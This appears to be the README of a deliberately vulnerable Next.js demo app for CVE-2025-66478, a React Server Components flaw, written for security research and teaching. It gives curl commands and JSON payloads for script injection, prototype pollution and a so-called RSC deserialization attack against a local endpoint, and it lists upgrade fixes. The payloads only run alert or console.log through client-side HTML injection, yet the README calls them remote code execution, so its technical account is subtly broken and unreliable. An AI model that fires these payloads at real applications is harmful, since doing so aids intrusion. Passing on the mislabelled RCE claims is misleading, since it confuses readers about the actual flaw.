Share
## https://sploitus.com/exploit?id=EDADB5A6-BA7B-51D1-99F5-DB39E74E5B6B
# CVE-2025-66478 Vulnerability Demo

This repository contains a deliberately vulnerable Next.js 15.0.0 application demonstrating **CVE-2025-66478**, a critical security vulnerability in React Server Components (RSC) protocol.

## โš ๏ธ WARNING

**This application is intentionally vulnerable and should ONLY be used for:**
- Educational purposes
- Security research
- Vulnerability testing in isolated environments
- Understanding CVE-2025-66478 impact

**NEVER deploy this to production environments!**

## ๐Ÿ“‹ Vulnerability Details

### CVE-2025-66478
- **Severity:** Critical (CVSS 10.0)
- **Impact:** Remote Code Execution
- **Affected Versions:** Next.js 15.0.0 - 15.0.4, Next.js 16.0.0 - 16.0.6
- **Fixed Versions:** Next.js 15.0.5+, Next.js 16.0.7+

### Root Cause
The React Server Components protocol in vulnerable Next.js versions allows untrusted input to influence server-side execution behavior. Attackers can craft malicious RSC payloads that trigger unintended server execution paths, leading to remote code execution.

## ๐Ÿš€ Quick Start

1. **Install dependencies:**
   ```bash
   npm install
   ```

2. **Run the vulnerable application:**
   ```bash
   npm run dev
   ```

3. **Access the demo:**
   Open http://localhost:3000 in your browser

## ๐ŸŽฏ Testing the Vulnerability

### Method 1: Web Interface
1. Navigate to the main page
2. Use the "Vulnerable RSC Processor" form
3. Try the exploit payloads from the "Exploit Testing Ground"

### Method 2: Direct API Testing
```bash
# Basic payload test
curl -X POST http://localhost:3000/api/process-rsc \
  -H "Content-Type: application/json" \
  -d '{"data":"{\"component\":\"div\",\"props\":{\"dangerouslySetInnerHTML\":{\"__html\":\"alert(1)\"}}" }'

# Advanced payload test
curl -X POST http://localhost:3000/api/process-rsc \
  -H "Content-Type: application/json" \
  -d '{"data":"{\"component\":\"__proto__\",\"props\":{\"constructor\":{\"prototype\":{\"dangerouslySetInnerHTML\":{\"__html\":\"console.log(\\"RCE via RSC\\")\"}}}}"}'
```

## ๐ŸŽญ Exploit Payloads

### 1. Basic Script Injection
```json
{
  "component": "div",
  "props": {
    "dangerouslySetInnerHTML": {
      "__html": "alert('XSS via RSC')"
    }
  }
}
```

### 2. Component Prototype Pollution
```json
{
  "component": "__proto__",
  "props": {
    "constructor": {
      "prototype": {
        "dangerouslySetInnerHTML": {
          "__html": "console.log('Prototype Pollution')"
        }
      }
    }
  }
}
```

### 3. RSC Deserialization Attack
```json
{
  "component": "div",
  "props": {
    "data-__rsc": "malicious_payload",
    "children": [
      {
        "$$typeof": "Symbol.for('react.element')",
        "type": "script",
        "props": {
          "dangerouslySetInnerHTML": {
            "__html": "console.log('RCE via RSC');"
          }
        }
      }
    ]
  }
}
```

## ๐Ÿ“Š Expected Results

### โœ… Successful Exploit (Vulnerable Version)
- **Browser:** JavaScript alerts execute, console logs appear
- **Server:** Payload processed without validation
- **Network:** 200 OK response with processed data
- **Impact:** Remote code execution possible

### โŒ Failed Exploit (Patched Version)
- **Browser:** No script execution, error messages
- **Server:** Input rejected or sanitized
- **Network:** 400/500 error responses
- **Impact:** Vulnerability mitigated

## ๐Ÿ”ง Mitigation

### Immediate Fix
Upgrade to patched versions:
```bash
# For Next.js 15.x
npm install next@15.0.5

# For Next.js 16.x  
npm install next@16.0.7
```

### Alternative Solutions
1. **Downgrade to stable 14.x:** `npm install next@14`
2. **Use Pages Router:** Not affected by this vulnerability
3. **Use Edge Runtime:** Not affected by this vulnerability

## ๐Ÿ›ก๏ธ Detection

Check if your application is vulnerable:

```bash
# Check Next.js version
npm list next

# Automated fix tool
npx fix-react2shell-next
```

## ๐Ÿ“š References

- [Next.js Security Advisory](https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp)
- [React Security Advisory](https://vulners.com/cve/CVE-2025-55182)
- [Next.js Blog Post](https://nextjs.org/blog/CVE-2025-66478)
- [React Blog Post](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)

## ๐Ÿ—๏ธ Project Structure

```
cve-2025-66478-demo/
โ”œโ”€โ”€ app/
โ”‚   โ”œโ”€โ”€ api/
โ”‚   โ”‚   โ””โ”€โ”€ process-rsc/
โ”‚   โ”‚       โ””โ”€โ”€ route.ts          # Vulnerable API endpoint
โ”‚   โ”œโ”€โ”€ globals.css
โ”‚   โ”œโ”€โ”€ layout.tsx               # Root layout
โ”‚   โ””โ”€โ”€ page.tsx                # Main page
โ”œโ”€โ”€ components/
โ”‚   โ”œโ”€โ”€ VulnerableComponent.tsx   # Vulnerable RSC processor
โ”‚   โ””โ”€โ”€ ExploitDemo.tsx         # Exploit testing interface
โ”œโ”€โ”€ package.json                # Dependencies (Next.js 15.0.0)
โ”œโ”€โ”€ next.config.js             # Next.js configuration
โ”œโ”€โ”€ tsconfig.json             # TypeScript configuration
โ””โ”€โ”€ README.md                 # This file
```

## ๐Ÿ“ License

This project is for educational purposes only. Use responsibly and in accordance with applicable laws and regulations.

## โš–๏ธ Disclaimer

This repository is created for security research and educational purposes. The author is not responsible for any misuse of this code or any damage caused by its use. Users are responsible for using this code ethically and legally.